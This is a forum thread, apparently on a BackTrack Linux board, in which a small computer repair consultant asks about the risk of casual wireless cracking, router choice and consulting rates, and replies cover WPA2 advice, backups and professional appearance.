Hello everyone, long time reader, first time poster. I run a small computer repair business. I mostly cater to home and small business. I do break/fix and consult on purchases and upgrades, and try to keep my clients up to date on what is going on in the world in laymen's terms. I know enough that I have no business in the corporate field yet. Backtrack is a great way for me to learn the intricacies of security, and to better show my clients during a pentest session how easy it is for the bad guys to get in. I hope to not bother anyone, but I had a few questions as my work is suddenly booming with clients scared for their networks security. Mostly theoretical stuff, but I want to be able to give general figures and numbers without just guessing.

1) Most of my clients are in suburbia, city sizes around 30,000 each, what is the chance of a random hacker just coming by to break wep/wpa encryption on a small business? Do hackers/ crackers just go out driving and look for places to mess with? I know there are a lot of factors involved in this, I am just trying to be able to comfort my clients a bit. Of course this is assuming there aren't any direct enemies or ex-employee's that hate the company.

2) What is a good brand of wireless router I might push on clients? I could sell them anything, as long as the price isn't too bad. I am looking for security and reliability, mostly for simple networks 2-10 people connected at any given time.

3) If there are any other home/small business consultants out there, what do you charge for your consulting sessions and/or setup of networks? I find myself switching between a flat rate of $250 to consult, setup, and secure a wireless network, and an hourly rate of $80. This seemed like a lot to me, but my clients love me and are more than happy to pay. I'm just more curious to know if I'm screwing them, being screwed, or about average.

Thank you again for taking the time to read this, even if you don't reply. Sorry I am long winded.

On a side note, someone posted earlier that a haircut and a nice suit goes a lot farther than actual experience. This sucks for some, but is completely true. I'm more the "cool haircut and powertie" kind of guy(no suit needed). It gets you through the door and makes clients not afraid to refer you, which is a big problem for self-employed low capital people like myself. If anyone has any questions about small business security work, feel free to ask, I'll do my best. I'm still getting a feel for the simple security aspect of consulting.


John

im not a proffesional, but yes people do go around breaking stuff for kicks. Because wep is gone in 60seconds in theory it wouldnt be to hard to crack every wep you ran across. WPA on the other hand takes a little bit more work(and a nice rainbow table)and might be the deterant you are looking for. If I was in your position I would personally take 10 minutes showing them how to connect to a WPA protected AP and maybe leaving them a memo?. Security through obscurity is almost unexsistant, Just because you didnt notice someone break in, it dosent mean it didnt happen :P

Thank you for your enquiry.

The current recommendation regarding security and encryption of wifi systems is WPA2. Coupling with an AES algorithm is usually considered sufficient. Your clients should be advised that all wifi systems should be treated as having a lower grade of overall security because transmissions can in general be more easily intercepted. WPA2 is considered adequate for most residential and small business systems.

When supplying hardware ensure that systems supplied can handle WPA/WPA2 encryption. Cheaper lines whilst adequate for general use may not be suitable for advanced encryption. Many, many users still use WEP based encryption and access restriction. This is not adequate, (though better than none!).

As with many aspects of ICT, the market moves rapidly. The marked increase in uptake of Digital Technologies during the next few years should encourage you to keep stocks low but offer a quick turnround.

So-called hackers/crackers do make attempts at cracking. Evidenced in this forum are the number of juveniles for whom this is 'great fun'. However, one is often calmed with the knowledge that few if any have the intellect to do anything to follow up (as regards an effective network attack) and therefore whilst information security is paramount it must be balanced with effective backup and restoration procedures. Small businesses are more likely to suffer from data degradation internally (simple employee error) than from attacks.

It is difficult to comment on adequacy of consultancy rates. Mine are considerably higher but the work is different. I would say that you should feel comfortable with the rates you are charging for the type of work you are doing.

The purpose of this forum is to discuss the BT distribution and the collection of software/tools which it embraces. If you have any queries related to any particular aspects please let us know.

Thank you very much for your reply. As much as I would love to ask more questions specifically regarding backtrack, I am comfortable with what I know so far. Having backtrack on hand for me is more of a catch-all. Only when they are non-believers do I have to actually whip it out. Actual penetration testing is almost a moot point with a residential or small business network.

On a side note, someone posted earlier that a haircut and a nice suit goes a lot farther than actual experience. This sucks for some, but is completely true. I'm more the "cool haircut and powertie" kind of guy(no suit needed). It gets you through the door and makes clients not afraid to refer you, which is a big problem for self-employed low capital people like myself. If anyone has any questions about small business security work, feel free to ask, I'll do my best. I'm still getting a feel for the simple security aspect of consulting.


John

I don't agree with your first statement here at all. Look at Best Buy's DorkSquad, all of those assjacks wear collared shirt and tie, and most of them don't know a motherboard from their a-hole.

In my experience, experience counts for everything. Certifications are meaningless unless you have some experience to put behind them. Greedy schools ruined the market for MSCE's making a decent wage, and I see the same thing happening with the CEH's. Now that MSCE's are bagging groceries, everyone is jumping on the security bandwagon, hoping to be the next hotshot that finds the next big 'sploit.

When dealing with the public, it's more important to be polite, knowledgeable and truthful. Explain things in terms that they understand and don't scare them with tech talk.

I both agree and disagree with you, but I feel it is more of a misunderstanding between us than an actual disagreement.

1) Geek Squad guys aren't what I was talking about by a haircut and a tie necesarily. What they wear can almost be considered a uniform, something akin to what you wear to a highschool graduation. Advice for many of us that are fashion deficient: go find a professional woman or a gay guy and have them take you shopping. I know too many techs that aren't even aware they make dress shirts in any color other than white. Everyone has a color that looks good on them...find it. Geeksquads stupid 'special agent' tie makes it so that a client will never take them very seriously. They will pay them, but they wont really feel good about it. Also, I'm not saying a haircut and tie will do your job for you, but it gets you in and it gets you out. What you do while your there is your own business.

2) While GeekSquad are a bunch of dorks that keep their fingers on the format button at every turn, they still do a very large volume of business. I have the standard circle of nerd friends that are all very talented, but are struggling to pay bills. They don't know the first thing about business. You can survive by being an independant technician, but to actually make a good living you either need a rock-solid business plan, or be so damn pretty housewives just want to call you to have a man around. Neither of those fit the bill for most techs. I keep something in my mind whenever I am on site that keeps me focused. I just do whatever it is I would do If I was trying to date their daughter. It sounds cheesy but it keeps me professional. These people are paying me a lot of money, the least I can do is make them feel comfortable.

You are absolutely right, the keypoints, Knowledgable, Truthful, and Polite. Having my clients like me is important, but having them love me keeps my schedule full and my wallet bulging. Oh...and business cards...invest a few extra bucks for the not-shitty ones, it makes other people less ashamed to hand your card to friends.

If all I wanted to do was fix computers in some lab somewhere, without care for dress, hygiene, or anything but the finished product, it would be easy. However, the average consultant rarely has that luxury.